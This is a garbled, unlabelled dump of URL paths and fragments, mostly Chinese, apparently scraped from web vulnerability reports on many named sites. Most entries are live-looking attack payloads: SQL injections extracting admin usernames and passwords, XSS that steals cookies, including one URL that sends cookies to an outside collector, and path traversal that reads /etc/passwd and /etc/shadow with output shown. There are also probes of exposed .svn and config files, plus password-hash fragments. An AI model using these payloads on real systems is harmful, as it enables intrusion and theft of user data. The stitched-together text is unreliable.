/1.txt / jf.10010.com//order/userEcardAction.do?command=submitUserCart&giftId=E21012&tm=xxxxxxx /web/BankCharge/BankChargeInit /paperdetail.aspx?id=1075 /tool/book/add/Book.aspx?id=3152 /single_info/selectlogin_1.asp /wwwroot.rar”,用迅雷尝试下载,成功下载到本地,得到一个大小为18.4MB的wwwroot.rar文件。解压缩之后,发现其中有个Login.asp文件,打开一看,开头有一句“DBConn.Open /vichy2010/s.php?id=331 /vichy2010/s.php?id=331 /phpyun_2.4_GBK_Beta.zip index.php?act=ajax&task=delupload将调用model/ajax.class.php中ajax_controller类的delupload_action函数 /index.php?act=ajax&task=delupload /course/?id=1 /FAQ/index.asp?FAQType=1 /disktest/task.aspx?guideid=177 /tool/book/add/Book.aspx?id=3031 /disktest/QuesQuiz.aspx?courseid=8 /disktest/question.aspx?guideid=1145 /admin/index.htm /APPStatistics/Report/FeedBack.aspx /report/search /report/lists /report/edit /report/put /report/del /report/lists,可以查看其他用户的邮箱地址和IP /report/search/0/0/2 /report/search/0/0/2,“2”这个位置有SQL注入点,是MYSQL库 /amfphp/browser/ /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cp%3E%3Ca%20href=%22javascript:alert(document.cookie)%22%3E%E6%9F%A5%E7%9C%8B%E8%B5%84%E6%96%99%3C/a%3E%3C/p%3E /superstar.php?mod=search&searchid=1&searchsubmit=yes&kw=\%27 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cimg%20style=%22display:none%22%20src=%221%22%20onerror=%22alert('xss')%22%20/%3E / /2.aspx /task/2010-07/11/358933/v6cxt6lf.txt /task/2010-04/19/276112/l8v40dx3.txt /task/2010-08/25/408398/vnwpl53p.txt /task/2010-10/10/458932/3x3dz8ag.txt /task/2010-02/28/234585/li2c18m0.txt /100ebooks/ProductsDetail.asp?MainProductID=2154 /100ebooks/ProductsDetail.asp?MainProductID=2154 / /discuz/admin.php /music/province/prov_index.action?provinceId=059 /1.asp?s="+str+"|"+cv /1.js /分站下面有 /2-8254/ /wawa/app/ /lod/hxsd_wjdc/cha1.php /hyinfo/action/JgxxAction_hwyjl?lx=00 /indexFrame.php#showCh(833,10,0,-1,1,1) /admin/login.php这个是后台登陆地址! 
/files/manucompare.php?manu_id[]=60&manu_id[]=50&manu_id[]=64 /pwview.php?id=51 /ajax/nipass.php?crumb=2ddbe31c540b024d39cd3d6e63641816&mobile=13********7 /feedback.html / /f/search/res?ie=utf-8&qw=gsid%3D3_5 /?gsid=****** /pay/checkout www.yeepai.com登陆账号点充值 /cgi-bin/admin/answer.cgi?id=85&action=enter /api/get_attention_num.php?uid=2771953021%20and%20sleep%2820%29=%281%29&suid=0&attention=suid&userpointuid=2771953021&s=1&varname=requestId_24666181 /pub?next=javascript:alert%281%29 /article/index.action?sec=267&request_locale=en /pk/street.php?keyword=1 /List.aspx?type=4%22;alert('xss');alert(document.cookie);var%20ttt=%22 /origin/book/find/?w=&k=%c0%27,0 /t/artists_list.php?tabtype=tagstyle&tagid=7,对tagid过滤不严,奇怪就奇怪在需要在url添加一个没有value的get变量,比如下面这个url: /t/artists_list.php?tabtype=tagstyle&tagid=7&xss /CheckUserMobile.do?mobile=“你的手机号” /CheckUserMobile.do?mobile=“你的手机号” /Query/logon.aspx /demo.html /VECenter/GuoPeiHwView.aspx?StudentJobID=810112 / /GetEntry.do?id=869693728&owner=275231305 /page/include/jsp/download.jsp?fileUrl=E:\Program http://item.taobao.com/item.htm?id=16383379477&ali_trackid=2:mm_14507416_2297358_8935934:1349851191_3k8_459371199 /zWIp5gH /?m=51mdq&a=A100124176&l=99999&l_cd1=0&l_cd2=1&tu=http%3A%2F%2Fwww.coo8.com /ajaxUserProfile_leaveword.php?customer_id=55586%27%20and%20%271%27=%271 /ajaxUserProfile_leaveword.php?customer_id=55586%27%20and%20%271%27=%272 /iPG/T-nsp/VodPlay.do?svstype=packd&pmId=0&mainPmId=179***&userId=16669*** /x.jpg\ 16.0 /event/44691 /accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener) /samshuai tmxk.Org/0.js none /question/12_72706 /question/565065_57506 /question/12_72706 http://www.oschina.net/question/100267_65116 /article/2007/0905/A20070905810709.shtml /u/254689/blog/53005 /xss-test-oschina-a-friendship.html /system/config/database.php_bak /category/1 /account/ajax/login_process/ /.svn/entries 
/app/.svn/entries /static/.svn/entries /models/.svn/entries /install/.svn/entries /system/.svn/entries /views/.svn/entries /app/account/ajax.php /app/account/find_password.php /app/account/main.php /app/account/openid.php /app/account/qq.php /app/account/setting.php /help/toHelpinfo.action存在struts任意代码执行漏洞 www.a.shifen.com www.a.shifen.com /people/296?notification_id-45654 / /api.php?action=File&ctrl=download&path=config.php /web_pub_cps_info.php?id=21 /file/download/?file_name=Y29uZmlnLnBocA==&url=Lmh0dHA6Ly93ZW5kYS5hbndzaW9uLmNvbS91cGxvYWRzLi9zeXN0ZW0vY29uZmlnL2RhdGFiYXNlLnBocA== /ddedu/download/software/ /ddedu/usereg/ddedu_user_reg2.jsp.nai /services / /bae /ddedu/upload/4/temp/aa.jsp /search?key=A / /Search.action /forum/editSubject/ajaxEditSubject /forum/editSubject/ajaxEditSubject www.sheca.com首页的快速通道有两个链接“证书查询和下载”和“下载专区 /service/generalDriver/ZSGLQ1108.rar,该安装包有三个驱动,随便安装一个即可。注意不要安装最新的“证书助手安装包”,会报找不到设备的错误。此外下载的页面还需要安装一个ActiveX控件。 /login.php/ PageData.power.forever_ban=1;void /rtx/download/index.shtml /userlist.php /c0bin6svn5 /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6/r00ts%E6%8A%80%E6%9C%AF%E5%B0%8F%E7%BB%84%E5%86%85%E9%83%A8%E5%B7%A5%E5%85%B7%E5%8C%85.rar?key=AAABQFB6H9H9sGX6&p=&a=10338190-3aa82f84&mode=download /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6 /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6/r00ts技术小组内部工具包.rar?key=AAABQFB6H9H9sGX6&p=&a=10338190-3aa82f84&mode=download /login.action /login.do?method=login /app/www/templates/paiba/js/topic.js中,暴露了加精置顶之类的具体操作。 /apps/paibaInfo.php /apps/paibaInfo.php 100% 500px 0px 0px z-index:1000 absolute alpha(opacity=0) /NAVIERR.HTM#500#javascript:alert(location);x=window.open('res://c:%255cprogra~1%255c360%255c360se%255cpages%255cpages.dll/NAVIERR.HTM%23500%23https://www.google.com');x.document.write www.ectrustprc.org.cn 
/newsShow.php?id=1297836243 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,database%28%29,3,4,5,6,7,8,9,10 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,2,3,4,5,concat%28GROUP_CONCAT%28DISTINCT%20table_name%29%29,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=0x65637472757374 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,name,3,4,5,password,7,8,9,10%20from%20admin_u /wap/more.php?file=company&newtypeid=25 /config.php.bak /admin.do /web/device/login?lang=1返回的信息可以判断出是H3C的web端 //,截图如下: /chinese-government-website-taken-down-database-leaked-by-venomsec/ /?q=joinus/view&id=94 /help/css/.svn/entries /help/.svn/entries /.svn/entries /web/album/.svn/entries /.svn/entries /.svn/entries /web/album/.svn/entries /vehicleweb/businessSite_QryAct.do?action=newQuery&dwdm=52010000 /news_show.php?id=18 /iframe_brief.php?style_id=103301880 / /caches/caches_yp/uptemplate/phpspy.php void(0) /kkotowicz/advanced-chrome-extension-exploitation) /UClick?gs=cmuclick&ad=1&location=xx /thread-tid-8226498.html /joao-paulo-campello/path-traversal-on-polycom-web-management-interface.html /joao-paulo-campello/polycom-web-management-interface-os-command-injection.html /bbs/ /home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E /home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1 /search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all /?q= /?act=login password=password&referer= /sql/install/database.sql /i/?act=getentry&page[]=1 /.svn/entries /admin/.svn/entries /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_act_admin /index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_lwds_user /app/search?kw=%c0%27//%28%000000%0deval 
/xss.js?'+Math.random();d.body.appendChild(e) /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/361.zip /201008/opel/deta.php?id=398868 /x。 /forum.php?mod=image&aid=70972&size=300x300&key=71f977c9884b819c817549937059c0bd&nocache=yes&type=fixnone /v_show/id_XNDU5NjYwMjEy.html#?abc= /beian/user/registeraction.action /201006/xals/e2.php?id=333158 /201006/xals/e2.php?id=333158 alert(1)//,发送私信。 /qqring_new/xml_friend_list.php /zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat /zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1-- / /console /content/catchInfo/getCatchInfo.action /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111%29%20xxx&op=delete_message /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111 /main.php?do=route_ajax_new&date=&flag=2&cache=0.44604623204620797&route_id=76041 /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /post/brute-crack-youku-accounts.html /post/brute-crack-youku-accounts-new.html /smartphone/login / / /uploads/allimg/121018/118_121018121325_1_lit.png /ddcms/login.php /ddcmss/login.php /www/mb/js/mi_121016.js /mblogpic/4955e75656b3d175296c/460#"><img none"><i /mblogpic/4955e75656b3d175296c/460#"><img none"><i /mblogpic/4955e75656b3d175296c/460#"><img none"><i /inbox/pm_mgr.php /mblogpic/4955e75656b3d175296c/460 none /bossweb/support/js/common.js /beta2/simple_admin/flogin.html /beta2/simple_admin/ /beta2/simple_admin/js/index.js /beta2/simple_admin/js/forumList.js /resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml / 
/login/toLogin.action地址发现,该网站存在struts命令执行漏洞,进入服务器后发现当前系统账号是root,通过相关配置文件可以进入数据库,目测该站同时存在管理员弱口令漏洞,安全意识需要加强。 /1037792196/main?mode=gfp_timeline /search?key=%3C/title%3Etest%3Cscript%3Ealert(/xss/)%3C/script%3E xsser.me/xxxxx /client/cguest?frienduin=10001 /client/cguest?frienduin=带有XSS的QQ号码, /order/getFreight.action?rt=0.11502742627635598 / / /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp / //resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml //resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /search?key=s;加“;”即出错,暴漏出内网地址。 /search?key=%2A%2F%2D%2D%3E%27%22%29%3B%3E%3C%2Fiframe%3E%3C%2Fscript%3E%3C%2Fstyle%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fwww%2Ebaidu%2Ecom%2Ecn%3E /hd/lol/index.php?m=Gameapply /5107.tar.gz /myspace.php /data\attachment\album\201210\19\164257p1p8qpyutxcua929.jpg/x.php /hivws/getShortBlogArticles.action?callback=?callback=发现。 /shangpin/s?wd=%d5\";alert(1);// /account/register!toReg.action?invitorCode=f366327df4fd052b4fe9854405bf5046 /Cooperation/haiwei/BookList.asp?Category=1 /Cooperation/haiwei/orderbook.asp?MainProductID=3463 /list.aspx?id=XXX /list/search/?category=160 /list/?key=&CategoryID=1 /selectcourse/recommDetail.shtm?edusubjectid=396&courseeduid=53 /?q=school/happydetail&id=29 /detail.php?id=44 /index.php?q=photo/index/detail&photoid=4012 /index.php?do=module&act=view&id=xxx /ajaxdo.php?module=attendbug&id=13620 /god/m/js/bbs.zh-cn.js D27CDB6E-AE6D-11cf-96B8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0 /go/getflashplayer /go/getflashplayer http://www.1.com/1.swf"><img/src="1"onerror="alert none;"><i/a="#.swf,width:480,height:320 /god/images/space.gif 
/1.swf"><img/src="1"onerror="alert(document.cookie);"style="display:none;"><i/a="#.swf /admin/manage.jsp / /?act=u_itemlist&queryinput=1 /uwc/cae/active.action?username= /uwc/testxx.jsp /interface/yulan.q?url=http://www.baidu.com /Login.aspx?ReturnUrl=%2fDefault.aspx /static/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg_1209/newspaper_10.html /static/newspaper_..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fhosts%2500.jpg/newspaper_10.html /ndvs/ /ndvs/dataPSW.js /index.php?q=mobile/product/detail&name=finder%27%20aNd%20 /bluesword/blue_sword.php?t=t_upload&Action=PostMsg /winners_detail.php?luckydate={SQL https://www.soopay.net/mymoney/login.do www.soopay.net /t4/webim/js/webim.js?v=683ba479e29b6483 /maxsize.191/data.vdisk.me/29995023/6477c6794eecaca3f31c125f7b16b1cad56af0ea?ip=1350836400,172.16.105.125&ssig=reE%2BtbnAoV&Expires=1350835200&KID=sae,l30zoo1wmz&source=209678993 /t4/appstyle/webim/images/file.gif /2/mss/msget?source=209678993&fid=176029019 /linkMe2.do /server-status /identity/.svn/entries /server-status /resin-doc/ gov.cn gov.cn gov.cn gov.cn /a/k?tcca=c3l**G9u**AwNzc=&urip=294**68**8&orlu=aHR0cDo******iYWlkdS5jb20=&spid=20**102***&area=1*6&tcca=c3l****9uZzAwNzc=&ktype=0&kwid=0&wtype=80&wsid=3** ?ts=1350798318..Content-Length ybXGwMnOwcT:i[INwcHmic36qcnd /a/p?adid=2***84&tcca=c3lfZ***ZzAwNzc=&urip=29470***94&orlu=aHR0cD***3d3dy5iYW***S5jb20=&spid=409***5190&area=146&ts=1350799***&pushFlag=0 /thread-418967-1-1.html /sanlixop/地址 /old/publish.php /qzone/space_item/pre/13/82717_1.png /12049976.wma /?q=user%2Fauthordetail&author=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /index.php?q=index%2Flist&style=0&page=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /index.php?q=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /sysadmin/htm/?q=user%2Flogin&back=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /find3findmore.tar /sysadmin/htm/fckeditor/editor/filemanager/connectors/test.html /info.php 
/inbox/pm_list.php /inbox/pm_conversation.php?account=xxx / /dbdata.sql /manager/html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /qzone/newblog/v5/script/common.js /qzone/newblog/v5/script/common.js inline-block hidden baseline /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /22222222222.swf /1 /22222222222.swf /music/musicbox_v2_1/img/MusicFlash.swf qzs.qq.com swf /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /1 /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /music/musicbox_v2_1/img/MusicFlash.swf /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html admin /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /service/down-search.aspx /login.jsp /xxoo.txt /diy/ /update/20090320/admin.php /job/index.php?key=%5c&page=1 /photo/index.php/%22%3e%3cscript%3ealert(9900)%3c/script%3e /job/index.php?page=1 /base/install/ /newsinfo.aspx?nid=53 /messageview.php?id=323 /investigationView.aspx?PID=10 /files/search.php?language=1%20and%201=2%20union%20select%201,user(),database(),version(),5,6,7,8,9,10,11,12,13,14,15-- /down.php?aid=109910 /admin/ /admin/photo.asp /basic/addrbook.php?gid=0%22%3E%3Cscript%3Ealert%28/xsssssssssss/%29%3C/script%3E%3C!-- 
m.taobao.com/somepage?sid=xxxx到hacker.com,那么hacker.com的访问记录里就可以看到如下的http /somepage?sid=xxxx / /static-content?contentPath=/../../../../../../etc/passwd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:77:77::/var/arpwatch:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:500:500::/home/tomcat:/bin/bash /static-content?contentPath=/../../../../../../etc/shadow 15419:0:99999:7 /zhaopin/regist/regist_maininfoInput.do?operflag=update&seqcode=4740 /PlatForm/SearchCenter/PersonalInfo.aspx?code=1068958 /MoreChildMenuServlet?code=003001001 /index.php?m=Guestbook&a=index&id=19 /admin/InfoInput/FormInfo/ShowForm1.aspx?typenumber=0101 www.xxx.com/cms/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector /cms/editor/filemanager/browser/default/browser.html?Type=../../../../Tomcat5.5_Gpower/webapps/cms&Connector=connectors/jsp/connector 
/s?word=%BA%A3%D4%F4%CD%F5&id=C2555&site=tudou.com&f=0&n=1&url=javascript:alert(document.domain);%22%20x=%22 /manager/ /gd_vblog/menu.action?format=json&tag=0&menuId=1 16.0 /tours/311094 /web/phone/common/find_pwd.jsp?account=手机号&source=51you /main.php /login.php /.svn/entries /.svn/text-base/login.php.svn-base /.svn/text-base/index.php.svn-base / / / /login_init.do void /tb/static-album/lib/bdtbmarklet.js?r='+Math.random()*99999999 /liantong namespace namespace /example/1-1.php?page= namespace /jackmasa /product.php?search="id= namespace /booklib/ProductList.asp?Category=267 /EngNews/News_Pra1.asp?NewsID=1764 /service/ask_v2.shtml?sid=1&cm=bank&aid=vip.pingtai.pay.index.qqvip /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e= /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e=x'&uin=自己的Q号&month=3&askeduin=好友的Q号 /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e=x''&uin=自己的Q号&month=3&askeduin=好友的Q号 /subcategory.php?scid=57 /nmds/stationOwnership!getSelectedStation.action /about/guest.html /linjunjie/01/ /file.php?filename=../../../../etc/passwd /EngNews/NewsUpLoad.asp / /upload/get-SN10086-Users.zip /uc/data/tmp/DVS.php?i1=shi1&i2=329 /upload/quali/b26f415b83c2c13a9d0837b5.jsp /user/addQuali.html %61%6c%65%72%74%28%27%68%61%68%61%20%67%75%6f%6b%72%20%78%73%73%27%29]http://1.1[/url /cheguansuo/homePage.action /wo/profile/的所在地可以构造XSS。 /campus.xhtml注册一个账户后可以填写求职简历,如果想增大hr的浏览概率就认真填写吧。其中涉及到资料填写的地方都未能过滤敏感字符,比如在填写在校奖励时加入 /cgi-bin/nw/focus.cgi?id=376 /index.php?q=mobile/product/detail&name=finder /?q=user/authordetail&author=1 //?act=u_example_more&itemid=862 /index.php?q=mobile/product/detail&name=finder /?q=user/authordetail&author=1 /index.php?q=admin/main/index/index //?act=u_example_more&itemid=862 //?act=u_example_more&itemid=862 ecbbs.ceair.com/1.php / /nc.aspx?Axon_key=ebca009a6f71a0d5eeee46fa7bd8eced&JumpUrl=0&id=2562388 localhost::localhost %::% /ques.zip /ques/ /ques/ThinkPHP/ThinkPHP.php 
/emall/LogonForm?storeId=10052&catalogId=10051&URL=http%3A%2F%2Fonline.suning.com%3A80%2Fwebchat%2Findex.jsp%3FtabId%3D--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E /.viminfo /.viminfo /skypebuy/?c=detail&productid=great_1m_unlimited_yn_euand /p/1947965617 /about.php?tid=27416573 /Goods/allcomment_616513.shtml/abc-abc-abc-$%7B@print /pptuan/10-0-1-0.shtml/abc/abc/abc/$%7B@print /css/templatecss/global.css/seay.php /json/show_buyer_list.htm?bid_page=1&item_type=b&item_id=AAAA&user_tag=BBBB&old_quantity=99999&zhichong=true&sold_total_num=16&seller_num_id=XXXXXXXXX&dk=0&callback=TShop.mods.DealRecord.reload&starts=1351000659000&ends=1351432659000&page_size=15 /interaction/lh_gy_content.php?coid=3&fromid=&nid=-20084 / /images/red/ /images/red/top1.jpg通过PUT /?c=user&a=message#write /shop/shopuser/myorder!queryDetail.action /f/search/ures?ie=utf-8&un=目标ID&from=prin /f/search/ures?ie=utf-8&un=%D2%BB%BD%E9p%B7%F2&from=prin /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,user() /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,database() /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,version() /intro.php?id=1271页面 /551651.html /static/.svn/entries /static/editor/uploads/.svn/entries /static/system/images/.svn/entries /static/editor/php/file_manager_json.php /crossdomain.xml /static/admin/images/logo.gif/1.php /lianbo/images/ipad/1.png/1.php /static/favicon.ico/1.php http://xianguo.com/book/shelf?beingsId=1378271&tagId=21818(须登录) tagId /download.action /postmail/actionBack/selectSubCate.action?email=wangwl@csair.com&subid=subid /snda_market_0.2/detail.php?id=2304%20and%201=2%20union%20select%201,2,user%28%29,4,database%28%29,version%28%29,7,8,@@basedir,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@datadir,29,30-- /phpmyadmin/ 
/wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&forwordemail=test@xss.com&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /tags.php?/a / /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&page=1&subtype=%E7%94%B5%E5%B7%A5%E7%94%B5%E5%99%A8%E6%88%90%E5%A5%97%E8%AE%BE%E5%A4%87&type=1 /com/admin/index.shtml / /emba/index.html / /Index/zhshow2?id=-1867%20UNION%20ALL%20SELECT%20NULL,user(),NULL,NULL,NULL,NULL,NULL /www/main/contact/.svn/entries /www/project/.svn/entries /1.asp www.lndangan.gov.cn/lndaj_asp/zwxx/ /show/search/searchlist.shtml?keyword=d /show/search/searchlist.shtml?keyword=d%25%27%20and%201=1%20and%20%27%25%27=%27 /show/search/searchlist.shtml?keyword=d%25%27%20and%201=2%20and%20%27%25%27=%27 /show/search/searchlist.shtml?keyword=dd /show/userinfo/selectuserinfo.shtml?describe=a%27 /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a%25%27%20and%20%27%25%27=%27 /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a%25%27%20and%201=2%20and%20%27%25%27=%27 /show/product/plist.shtml?maintype=a&subtype=b&thirdtype=c&page=1&type=1 /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&subtype=%E7%BA%B8%E5%8A%A0%E5%B7%A5%E6%9C%BA%E6%A2%B0&thirdtype=%E6%8A%98%E9%A1%B5%E6%9C%BA'&page=1&type=1 /show/product/plist.shtml?maintype=%E4%BA%A4%E9%80%9A%E8%BF%90%E8%BE%93&subtype=%E9%9D%9E%E6%9C%BA%E5%8A%A8%E8%BD%A6&thirdtype=%E5%85%B6%E4%BB%96%E9%9D%9E%E6%9C%BA%E5%8A%A8%E8%BD%A6&page=1&type=1 /show/product/plist.shtml?maintype=%E5%B7%A5%E8%89%BA%E7%A4%BC%E5%93%81'&subtype=%E4%BC%A0%E7%BB%9F%E5%B7%A5%E8%89%BA%E5%93%81&thirdtype=%E6%A0%B9%E9%9B%95&page=1&type=1 
/show/product/plist.shtml?maintype=%E6%9C%8D%E9%A5%B0'&subtype=%E7%AE%B1%E5%8C%85&thirdtype=%E7%94%B5%E8%84%91%E5%8C%85&page=1&type=1 /show/product/plist.shtml?maintype=%E5%BB%BA%E7%AD%91%E5%BB%BA%E6%9D%90&subtype=%E5%BB%BA%E7%AD%91%E3%80%81%E5%BB%BA%E6%9D%90%E7%B1%BB%E7%AE%A1%E6%9D%90&thirdtype=PP%E7%AE%A1&page=1&type=1 /show/product/plist.shtml?maintype=%E6%A0%91%E8%84%82&subtype=%E9%80%9A%E7%94%A8%E5%8E%9F%E6%96%99&thirdtype=PP&page=1&type=1 /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=desc /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=,name%20desc /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=,if%28%28true%29,id,name%29%20desc /saaselect.action?show=list&sort=name&order=desc,if%28%28false%29,1,2%29%20desc /Index/index /Index/introduce?id=20 /Index/active2?id=23 /Index/sj?id=39 / /) /) /login-share/tomlogin/login.action Ethernet 172.24.205.15 172.24.205.255 255.255.255.0 MTU:1500 packets:81041 txqueuelen:1000 f8000000-f8012800 /newscontent.php?pid=41 /i/control/checkPassword?newpassword=密码&confirmPassword=密码&uid=用户id。只需要遍历id就可以随意更改别人密码,而且id还是五位的数字。 /hiwebcms/system/USER/ /hiwebcms/system/sysSetup/filesManage.htm /hiwebcms/system/sysSetup/sysSetup.htm /hiwebcms/system/USER/userConfig.htm /interface.php /security/vulnerabilities_22.html /archives/fulldisclosure/2011-08/att-0203/killapache.pl /admin/User/UserAdd.aspx /list.php?id=499 /list.php?id=680 /caches/configs/database.php /caches/configs/system.php www.baidu.com后添加至主屏幕,主屏幕中添加了百度的应用 /site_ads_show.php?id=83&cType=&cityId=5 /site_ads_show.php?id=83&cType=&cityId=5 08e376701e790f04:localhost pma_DhtLYkFECwdu:5d4b619e2d58ba5d:localhost 73c1ec84153efe54:localhost 30cbb26929889d33:localhost 14ac2cc36e9856b1:localhost 14ac2cc36e9856b1:localhost 14ac2cc36e9856b1:localhost 76fe3dcc295814a5:localhost /info/locoy2050.php /event/img/tuzi1029.jpg/1111.php /cgi-bin/team/show.cgi?id=533 
